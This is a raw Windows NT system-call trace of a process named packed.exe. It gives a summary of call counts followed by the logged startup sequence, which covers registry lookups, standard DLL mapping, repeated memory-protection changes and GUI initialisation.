Summary:


NtCancelTimer(>)  1 
NtGdiSaveDC(>)  2 
NtReleaseSemaphore(>)  5 
NtQueryDebugFilterState(>)  37 

NtCreatePort(>)  1 
NtGdiSetDIBitsToDeviceInternal(>)  2 
NtRegisterThreadTerminatePort(>)  6 
NtRequestWaitReplyPort(>)  37 

NtCreateProcessEx(>)  1 
NtLockFile(>)  2 
NtSetInformationObject(>)  6 
NtUserGetClassInfo(>)  37 

NtCreateTimer(>)  1 
NtOpenDirectoryObject(>)  2 
NtTestAlert(>)  6 
NtUnmapViewOfSection(>)  38 

NtDelayExecution(>)  1 
NtOpenSymbolicLinkObject(>)  2 
NtWaitForMultipleObjects(>)  6 
NtQueryDirectoryFile(>)  40 

NtFindAtom(>)  1 
NtQueryEvent(>)  2 
NtCreateThread(>)  7 
NtSetInformationFile(>)  47 

NtGdiBitBlt(>)  1 
NtQueryInstallUILanguage(>)  2 
NtFreeVirtualMemory(>)  7 
NtUserFindExistingCursorIcon(>)  49 

NtGdiCreateCompatibleBitmap(>)  1 
NtQueryPerformanceCounter(>)  2 
NtResumeThread(>)  7 
NtFlushInstructionCache(>)  52 

NtGdiCreateDIBitmapInternal(>)  1 
NtQuerySymbolicLinkObject(>)  2 
NtSetInformationThread(>)  7 
NtQueryDefaultLocale(>)  54 

NtGdiCreatePatternBrushInternal(>)  1 
NtQuerySystemTime(>)  2 
NtUserCallNoParam(>)  7 
NtSetInformationProcess(>)  55 

NtGdiExtGetObjectW(>)  1 
NtRemoveIoCompletion(>)  2 
NtContinue(>)  9 
NtCreateEvent(>)  57 

NtGdiInit(>)  1 
NtUnlockFile(>)  2 
NtDuplicateObject(>)  9 
NtCreateKey(>)  58 

NtGdiQueryFontAssocInfo(>)  1 
NtUserGetProcessWindowStation(>)  2 
NtSetEvent(>)  9 
NtUserRegisterClassExWOW(>)  65 

NtOpenKeyedEvent(>)  1 
NtUserGetThreadDesktop(>)  2 
NtOpenMutant(>)  10 
NtCreateSection(>)  68 

NtQueryInformationJobObject(>)  1 
NtUserSetProp(>)  2 
NtUserGetWindowDC(>)  10 
NtQueryInformationProcess(>)  69 

NtQueryObject(>)  1 
NtCreateIoCompletion(>)  3 
NtQueryVolumeInformationFile(>)  11 
NtWaitForSingleObject(>)  74 

NtQueryTimerResolution(>)  1 
NtDeleteValueKey(>)  3 
NtUserSystemParametersInfo(>)  11 
NtQueryVirtualMemory(>)  75 

NtReplyWaitReceivePortEx(>)  1 
NtDuplicateToken(>)  3 
NtOpenEvent(>)  12 
NtOpenSection(>)  77 

NtSecureConnectPort(>)  1 
NtQuerySecurityObject(>)  3 
NtGdiSelectBitmap(>)  13 
NtReadFile(>)  88 

NtSetIoCompletion(>)  1 
NtReadVirtualMemory(>)  3 
NtOpenProcessToken(>)  13 
NtMapViewOfSection(>)  101 

NtSetTimer(>)  1 
NtUserGetDC(>)  3 
NtWriteFile(>)  13 
NtEnumerateValueKey(>)  108 

NtUserGetAtomName(>)  1 
NtAddAtom(>)  4 
NtEnumerateKey(>)  14 
NtOpenProcessTokenEx(>)  117 

NtUserGetClassName(>)  1 
NtGdiCreateCompatibleDC(>)  4 
NtQueryDefaultUILanguage(>)  14 
NtOpenThreadTokenEx(>)  117 

NtUserGetGUIThreadInfo(>)  1 
NtSetEventBoostPriority(>)  4 
NtUserCallOneParam(>)  15 
NtQuerySystemInformation(>)  126 

NtUserSetCursorIconData(>)  1 
NtUserCreateWindowEx(>)  4 
NtNotifyChangeKey(>)  20 
NtProtectVirtualMemory(>)  127 

NtUserSetWindowLong(>)  1 
NtUserGetObjectInformation(>)  4 
NtCreateSemaphore(>)  22 
NtQueryKey(>)  130 

NtAccessCheck(>)  2 
NtUserMessageCall(>)  4 
NtUserRegisterWindowMessage(>)  23 
NtQueryInformationToken(>)  138 

NtCallbackReturn(>)  2 
NtUserSelectPalette(>)  4 
NtOpenThreadToken(>)  27 
NtOpenFile(>)  147 

NtGdiCreateBitmap(>)  2 
NtWriteVirtualMemory(>)  4 
NtFsControlFile(>)  30 
NtAllocateVirtualMemory(>)  151 

NtGdiCreateSolidBrush(>)  2 
NtClearEvent(>)  5 
NtQueryInformationFile(>)  33 
NtQueryAttributesFile(>)  197 

NtGdiDeleteObjectApp(>)  2 
NtConnectPort(>)  5 
NtCreateFile(>)  34 
NtQueryValueKey(>)  491 

NtGdiGetDCObject(>)  2 
NtCreateMutant(>)  5 
NtDeviceIoControlFile(>)  35 
NtOpenKey(>)  560 

NtGdiGetDCforBitmap(>)  2 
NtGdiGetStockObject(>)  5 
NtQuerySection(>)  36 
NtClose(>)  700 

NtGdiHfontCreate(>)  2 
NtOpenProcess(>)  5 
NtReleaseMutant(>)  36 

NtGdiRestoreDC(>)  2 
NtQueryInformationThread(>)  5 

Trace:
 00001   456   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\packed.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00002   456   NtOpenKeyedEvent  (0x2000000, {24, 0, 0x0, 0, 0,  (0x2000000, {24, 0, 0x0, 0, 0, "\KernelObjects\CritSecOutOfMemoryEvent"}, ... 4, ) }, ... 4, ) == 0x0
 00003   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00004   456   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 1310720, 1048576, ) == 0x0
 00005   456   NtAllocateVirtualMemory  (-1, 1310720, 0, 4096, 4096, 4, ... 1310720, 4096, ) == 0x0
 00006   456   NtAllocateVirtualMemory  (-1, 1314816, 0, 8192, 4096, 4, ... 1314816, 8192, ) == 0x0
 00007   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00008   456   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 2359296, 65536, ) == 0x0
 00009   456   NtAllocateVirtualMemory  (-1, 2359296, 0, 24576, 4096, 4, ... 2359296, 24576, ) == 0x0
 00010   456   NtOpenDirectoryObject  (0x3, {24, 0, 0x40, 0, 0,  (0x3, {24, 0, 0x40, 0, 0, "\KnownDlls"}, ... 8, ) }, ... 8, ) == 0x0
 00011   456   NtOpenSymbolicLinkObject  (0x1, {24, 8, 0x40, 0, 0,  (0x1, {24, 8, 0x40, 0, 0, "KnownDllPath"}, ... 12, ) }, ... 12, ) == 0x0
 00012   456   NtQuerySymbolicLinkObject  (12, ...  (12, ... "C:\WINDOWS\system32", 0x0, ) , 0x0, ) == 0x0
 00013   456   NtClose  (12, ... ) == 0x0
 00014   456   NtOpenFile  (0x100020, {24, 0, 0x42, 0, 0,  (0x100020, {24, 0, 0x42, 0, 0, "\??\U:\startupscripts\"}, 3, 33, ... 12, {status=0x0, info=1}, ) }, 3, 33, ... 12, {status=0x0, info=1}, ) == 0x0
 00015   456   NtQueryVolumeInformationFile  (12, 1243848, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 00016   456   NtFsControlFile  (12, 0, 0x0, 0x0, 0x90028, 0x0, 0, 0, ... ) == STATUS_INVALID_PARAMETER
 00017   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local"}, 1243832, ... ) }, 1243832, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00018   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "kernel32.dll"}, ... 16, ) }, ... 16, ) == 0x0
 00019   456   NtMapViewOfSection  (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77e60000), 0x0, 937984, ) == 0x0
 00020   456   NtClose  (16, ... ) == 0x0
 00021   456   NtQuerySystemInformation  (RangeStart, 4, ... {system info, class 50, size 4}, 0x0, ) == 0x0
 00022   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00023   456   NtCreateSection  (0xf001f, 0x0, {65536, 0}, 4, 67108864, 0, ... 16, ) == 0x0
 00024   456   NtSecureConnectPort  ( ("\Windows\ApiPort", {0, 2, 1, 1}, {24, 16, 0, 65536, 0, 0}, 1319736, {12, 0, 0}, 1242016, 44, ... 24, {24, 16, 0, 65536, 2424832, 18415616}, {0, 0, 0}, 200, 44, ) , {0, 2, 1, 1}, {24, 16, 0, 65536, 0, 0}, 1319736, {12, 0, 0}, 1242016, 44, ... 24, {24, 16, 0, 65536, 2424832, 18415616}, {0, 0, 0}, 200, 44, ) == 0x0
 00025   456   NtClose  (16, ... ) == 0x0
 00026   456   NtQueryObject  (24, Handle, 2, ... {Inherit=0,ProtectFromClose=0,}, -1, ) == 0x0
 00027   456   NtSetInformationObject  (24, Handle, {Inherit=0,ProtectFromClose=1,}, 256, ... ) == 0x0
 00028   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00029   456   NtQueryVirtualMemory  (-1, 0x250000, Basic, 28, ... {BaseAddress=0x250000,AllocationBase=0x250000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x40000,}, 0x0, ) == 0x0
 00030   456   NtAllocateVirtualMemory  (-1, 2424832, 0, 4096, 4096, 4, ... 2424832, 4096, ) == 0x0
 00031   456   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 0, 0, 0, 0}  (24, {28, 56, new_msg, 0, 0, 0, 0, 0} "\210\6\31\1\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\234\6\31\1\4\0\0\0" ... {28, 56, reply, 0, 452, 456, 1478, 0} "`\323\26\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\234\6\31\1\4\0\0\0" )  ... {28, 56, reply, 0, 452, 456, 1478, 0}  (24, {28, 56, new_msg, 0, 0, 0, 0, 0} "\210\6\31\1\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\234\6\31\1\4\0\0\0" ... {28, 56, reply, 0, 452, 456, 1478, 0} "`\323\26\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\234\6\31\1\4\0\0\0" )  ) == 0x0
 00032   456   NtRegisterThreadTerminatePort  (24, ... ) == 0x0
 00033   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Terminal Server"}, ... 16, ) }, ... 16, ) == 0x0
 00034   456   NtQueryValueKey  (16,  (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00035   456   NtClose  (16, ... ) == 0x0
 00036   456   NtAllocateVirtualMemory  (-1, 1232896, 0, 4096, 4096, 260, ... 1232896, 4096, ) == 0x0
 00037   456   NtOpenMutant  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\NlsCacheMutant"}, ... 16, ) }, ... 16, ) == 0x0
 00038   456   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionUnicode"}, ... 28, ) }, ... 28, ) == 0x0
 00039   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x260000), 0x0, 90112, ) == 0x0
 00040   456   NtClose  (28, ... ) == 0x0
 00041   456   NtQueryDefaultLocale  (0, 2012046252, ... ) == 0x0
 00042   456   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionLocale"}, ... 28, ) }, ... 28, ) == 0x0
 00043   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x280000), 0x0, 212992, ) == 0x0
 00044   456   NtClose  (28, ... ) == 0x0
 00045   456   NtOpenSection  (0x5, {24, 0, 0x40, 0, 0,  (0x5, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortkey"}, ... 28, ) }, ... 28, ) == 0x0
 00046   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x2c0000), 0x0, 266240, ) == 0x0
 00047   456   NtQuerySection  (28, Basic, 16, ... {BaseAddress=0x0,Attributes=0x800000,Size={0x40004, 0x0},}, 0x0, ) == 0x0
 00048   456   NtClose  (28, ... ) == 0x0
 00049   456   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortTbls"}, ... 28, ) }, ... 28, ) == 0x0
 00050   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x310000), 0x0, 24576, ) == 0x0
 00051   456   NtClose  (28, ... ) == 0x0
 00052   456   NtQueryVirtualMemory  (-1, 0x7ffd2000, Basic, 28, ... {BaseAddress=0x7ffd2000,AllocationBase=0x7ffb0000,AllocationProtect=0x2,RegionSize=0x2000,State=0x1000,Protect=0x2,Type=0x40000,}, 0x0, ) == 0x0
 00053   456   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortkey00000409"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00054   456   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortkey00000409"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00055   456   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 2012558373, 2012047104, 2013025280, 0}  (24, {28, 56, new_msg, 0, 2012558373, 2012047104, 2013025280, 0} "\210\6\31\1\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6\31\18\6\0\0" ... {28, 56, reply, 0, 452, 456, 1488, 0} "\230\243\26\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6\31\18\6\0\0" )  ... {28, 56, reply, 0, 452, 456, 1488, 0}  (24, {28, 56, new_msg, 0, 2012558373, 2012047104, 2013025280, 0} "\210\6\31\1\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6\31\18\6\0\0" ... {28, 56, reply, 0, 452, 456, 1488, 0} "\230\243\26\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6\31\18\6\0\0" )  ) == 0x0
 00056   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "COMCTL32.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00057   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77340000), 0x0, 569344, ) == 0x0
 00058   456   NtClose  (28, ... ) == 0x0
 00059   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "GDI32.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00060   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77c70000), 0x0, 262144, ) == 0x0
 00061   456   NtClose  (28, ... ) == 0x0
 00062   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "USER32.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00063   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77d40000), 0x0, 577536, ) == 0x0
 00064   456   NtClose  (28, ... ) == 0x0
 00065   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "ADVAPI32.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00066   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77dd0000), 0x0, 569344, ) == 0x0
 00067   456   NtClose  (28, ... ) == 0x0
 00068   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "RPCRT4.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00069   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77cc0000), 0x0, 479232, ) == 0x0
 00070   456   NtClose  (28, ... ) == 0x0
 00071   456   NtProtectVirtualMemory  (-1, (0x407000), 652, 4, ... (0x407000), 4096, 2, ) == 0x0
 00072   456   NtProtectVirtualMemory  (-1, (0x407000), 4096, 2, ... (0x407000), 4096, 4, ) == 0x0
 00073   456   NtFlushInstructionCache  (-1, 4222976, 652, ... ) == 0x0
 00074   456   NtProtectVirtualMemory  (-1, (0x407000), 652, 4, ... (0x407000), 4096, 2, ) == 0x0
 00075   456   NtProtectVirtualMemory  (-1, (0x407000), 4096, 2, ... (0x407000), 4096, 4, ) == 0x0
 00076   456   NtFlushInstructionCache  (-1, 4222976, 652, ... ) == 0x0
 00077   456   NtProtectVirtualMemory  (-1, (0x407000), 652, 4, ... (0x407000), 4096, 2, ) == 0x0
 00078   456   NtProtectVirtualMemory  (-1, (0x407000), 4096, 2, ... (0x407000), 4096, 4, ) == 0x0
 00079   456   NtFlushInstructionCache  (-1, 4222976, 652, ... ) == 0x0
 00080   456   NtProtectVirtualMemory  (-1, (0x407000), 652, 4, ... (0x407000), 4096, 2, ) == 0x0
 00081   456   NtProtectVirtualMemory  (-1, (0x407000), 4096, 2, ... (0x407000), 4096, 4, ) == 0x0
 00082   456   NtFlushInstructionCache  (-1, 4222976, 652, ... ) == 0x0
 00083   456   NtProtectVirtualMemory  (-1, (0x407000), 652, 4, ... (0x407000), 4096, 2, ) == 0x0
 00084   456   NtProtectVirtualMemory  (-1, (0x407000), 4096, 2, ... (0x407000), 4096, 4, ) == 0x0
 00085   456   NtFlushInstructionCache  (-1, 4222976, 652, ... ) == 0x0
 00086   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "SHELL32.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00087   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x773d0000), 0x0, 8339456, ) == 0x0
 00088   456   NtClose  (28, ... ) == 0x0
 00089   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "msvcrt.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00090   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77c10000), 0x0, 339968, ) == 0x0
 00091   456   NtClose  (28, ... ) == 0x0
 00092   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "SHLWAPI.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00093   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x772d0000), 0x0, 405504, ) == 0x0
 00094   456   NtClose  (28, ... ) == 0x0
 00095   456   NtProtectVirtualMemory  (-1, (0x407000), 652, 4, ... (0x407000), 4096, 2, ) == 0x0
 00096   456   NtProtectVirtualMemory  (-1, (0x407000), 4096, 2, ... (0x407000), 4096, 4, ) == 0x0
 00097   456   NtFlushInstructionCache  (-1, 4222976, 652, ... ) == 0x0
 00098   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "ole32.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00099   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x771b0000), 0x0, 1155072, ) == 0x0
 00100   456   NtClose  (28, ... ) == 0x0
 00101   456   NtProtectVirtualMemory  (-1, (0x407000), 652, 4, ... (0x407000), 4096, 2, ) == 0x0
 00102   456   NtProtectVirtualMemory  (-1, (0x407000), 4096, 2, ... (0x407000), 4096, 4, ) == 0x0
 00103   456   NtFlushInstructionCache  (-1, 4222976, 652, ... ) == 0x0
 00104   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "VERSION.dll"}, ... 28, ) }, ... 28, ) == 0x0
 00105   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77c00000), 0x0, 28672, ) == 0x0
 00106   456   NtClose  (28, ... ) == 0x0
 00107   456   NtProtectVirtualMemory  (-1, (0x407000), 652, 4, ... (0x407000), 4096, 2, ) == 0x0
 00108   456   NtProtectVirtualMemory  (-1, (0x407000), 4096, 2, ... (0x407000), 4096, 4, ) == 0x0
 00109   456   NtFlushInstructionCache  (-1, 4222976, 652, ... ) == 0x0
 00110   456   NtOpenProcessToken  (-1, 0x8, ... 28, ) == 0x0
 00111   456   NtQueryInformationToken  (28, Statistics, 56, ... {token info, class 10, size 56}, 56, ) == 0x0
 00112   456   NtClose  (28, ... ) == 0x0
 00113   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Terminal Server"}, ... 28, ) }, ... 28, ) == 0x0
 00114   456   NtQueryValueKey  (28,  (28, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (28, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00115   456   NtClose  (28, ... ) == 0x0
 00116   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00117   456   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 1246456, 1, 24, 2012568566}  (24, {28, 56, new_msg, 0, 1246456, 1, 24, 2012568566} "\210\6\31\1\0\0\0\0\314\4\23\0\324Wh\364\3\0\0\0\234\6\31\1$\1\0\0" ... {28, 56, reply, 0, 452, 456, 1491, 0} "XQ\26\0\0\0\0\0\0\0\0\0\324Wh\364\3\0\0\0\234\6\31\1$\1\0\0" )  ... {28, 56, reply, 0, 452, 456, 1491, 0}  (24, {28, 56, new_msg, 0, 1246456, 1, 24, 2012568566} "\210\6\31\1\0\0\0\0\314\4\23\0\324Wh\364\3\0\0\0\234\6\31\1$\1\0\0" ... {28, 56, reply, 0, 452, 456, 1491, 0} "XQ\26\0\0\0\0\0\0\0\0\0\324Wh\364\3\0\0\0\234\6\31\1$\1\0\0" )  ) == 0x0
 00118   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Error Message Instrument\"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00119   456   NtMapViewOfSection  (28, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x440000), 0x0, 1060864, ) == 0x0
 00120   456   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 32, ) == 0x0
 00121   456   NtOpenThreadTokenEx  (-2, 0x8, 1, 512, ... ) == STATUS_NO_TOKEN
 00122   456   NtOpenProcessTokenEx  (-1, 0x8, 512, ... -2147482016, ) == 0x0
 00123   456   NtQueryInformationToken  (-2147482016, Statistics, 0, ... ) == STATUS_BUFFER_TOO_SMALL
 00124   456   NtQueryInformationToken  (-2147482016, Statistics, 56, ... {token info, class 10, size 56}, 56, ) == 0x0
 00125   456   NtClose  (-2147482016, ... ) == 0x0
 00126   456   NtAllocateVirtualMemory  (-1, 0, 0, 32, 4096, 4, ... 4128768, 4096, ) == 0x0
 00127   456   NtFreeVirtualMemory  (-1, (0x3f0000), 4096, 32768, ... (0x3f0000), 4096, ) == 0x0
 00128   456   NtDuplicateObject  (-1, 36, -1, 0x0, 0, 2, ... 44, ) == 0x0
 00129   456   NtOpenKey  (0x20019, {24, 0, 0x240, 0, 0,  (0x20019, {24, 0, 0x240, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Compatibility32"}, ... -2147482016, ) }, ... -2147482016, ) == 0x0
 00130   456   NtQueryValueKey  (-2147482016,  (-2147482016, "packed", Partial, 172, ... ) , Partial, 172, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00131   456   NtClose  (-2147482016, ... ) == 0x0
 00132   456   NtOpenKey  (0x20019, {24, 0, 0x240, 0, 0,  (0x20019, {24, 0, 0x240, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\IME Compatibility"}, ... -2147482016, ) }, ... -2147482016, ) == 0x0
 00133   456   NtQueryValueKey  (-2147482016,  (-2147482016, "packed", Partial, 172, ... ) , Partial, 172, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00134   456   NtClose  (-2147482016, ... ) == 0x0
 00135   456   NtQueryDefaultLocale  (0, -130577908, ... ) == 0x0
 00136   456   NtGdiQueryFontAssocInfo  (0, ... ) == 0x0
 00137   456   NtUserCallNoParam  (24, ... ) == 0x0
 00138   456   NtGdiCreateCompatibleDC  (0, ...
 00139   456   NtAllocateVirtualMemory  (-1, 0, 0, 4096, 12288, 4, ... 4128768, 4096, ) == 0x0
 00138   456   NtGdiCreateCompatibleDC  ... ) == 0x90103da
 00140   456   NtGdiGetStockObject  (0, ... ) == 0x1900010
 00141   456   NtGdiGetStockObject  (4, ... ) == 0x1900011
 00142   456   NtGdiCreateBitmap  (8, 8, 1, 1, 2010393708, ... ) == 0x40503e9
 00143   456   NtGdiCreateSolidBrush  (0, 0, ...
 00144   456   NtAllocateVirtualMemory  (-1, 0, 0, 4096, 12288, 4, ... 8716288, 4096, ) == 0x0
 00143   456   NtGdiCreateSolidBrush  ... ) == 0x21003e7
 00145   456   NtGdiGetStockObject  (13, ... ) == 0x18a0021
 00146   456   NtGdiCreateCompatibleDC  (0, ... ) == 0x20103e8
 00147   456   NtGdiSelectBitmap  (33620968, 67437545, ... ) == 0x185000f
 00148   456   NtUserGetThreadDesktop  (456, 0, ... ) == 0x28
 00149   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Windows"}, ... 48, ) }, ... 48, ) == 0x0
 00150   456   NtQueryValueKey  (48,  (48, "AppInit_DLLs", Partial, 64, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 64, ... TitleIdx=0, Type=1, Data= (48, "AppInit_DLLs", Partial, 64, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0
 00151   456   NtClose  (48, ... ) == 0x0
 00152   456   NtUserFindExistingCursorIcon  (1241204, 1241220, 1241788, ... ) == 0x10011
 00153   456   NtUserRegisterClassExWOW  (1241724, 1241804, 1241788, 1241820, 673, 128, 0, ... ) == 0x810dc017
 00154   456   NtUserFindExistingCursorIcon  (1241204, 1241220, 1241788, ... ) == 0x10011
 00155   456   NtUserRegisterClassExWOW  (1241724, 1241804, 1241788, 1241820, 674, 128, 0, ... ) == 0x810dc01c
 00156   456   NtUserFindExistingCursorIcon  (1241204, 1241220, 1241788, ... ) == 0x10011
 00157   456   NtUserRegisterClassExWOW  (1241724, 1241804, 1241788, 1241820, 675, 128, 0, ... ) == 0x810dc01e
 00158   456   NtUserFindExistingCursorIcon  (1241204, 1241220, 1241788, ... ) == 0x10011
 00159   456   NtUserRegisterClassExWOW  (1241724, 1241804, 1241788, 1241820, 676, 128, 0, ... ) == 0x810d8002
 00160   456   NtUserFindExistingCursorIcon  (1241204, 1241220, 1241788, ... ) == 0x10013
 00161   456   NtUserRegisterClassExWOW  (1241724, 1241804, 1241788, 1241820, 677, 128, 0, ... ) == 0x810dc018
 00162   456   NtUserFindExistingCursorIcon  (1241204, 1241220, 1241788, ... ) == 0x10011
 00163   456   NtUserRegisterClassExWOW  (1241724, 1241804, 1241788, 1241820, 678, 128, 0, ... ) == 0x810dc01a
